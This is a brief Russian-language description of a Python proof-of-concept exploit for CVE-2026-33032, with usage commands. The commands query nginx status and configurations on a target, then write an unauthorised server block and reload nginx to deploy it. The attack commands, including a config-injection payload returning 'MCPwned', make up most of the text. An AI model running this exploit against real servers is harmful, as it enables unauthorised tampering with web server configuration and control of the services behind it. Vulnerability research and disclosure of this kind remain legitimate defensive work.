
Концепт-эксплойт на Python для CVE-2026-33032, который проверяет статус и конфигурации nginx, а затем демонстрирует несанкционированную запись конфигурации с последующей перезагрузкой для развертывания поддельного серверного блока.
python3 main.py http://target:9000 --tool nginx_status
python3 main.py 10.0.0.50 --tool nginx_config_list
python3 main.py http://target:9000 \
--tool nginx_config_add \
--payload poc.conf \
--content 'server { listen 8443; return 200 "MCPwned\n"; }'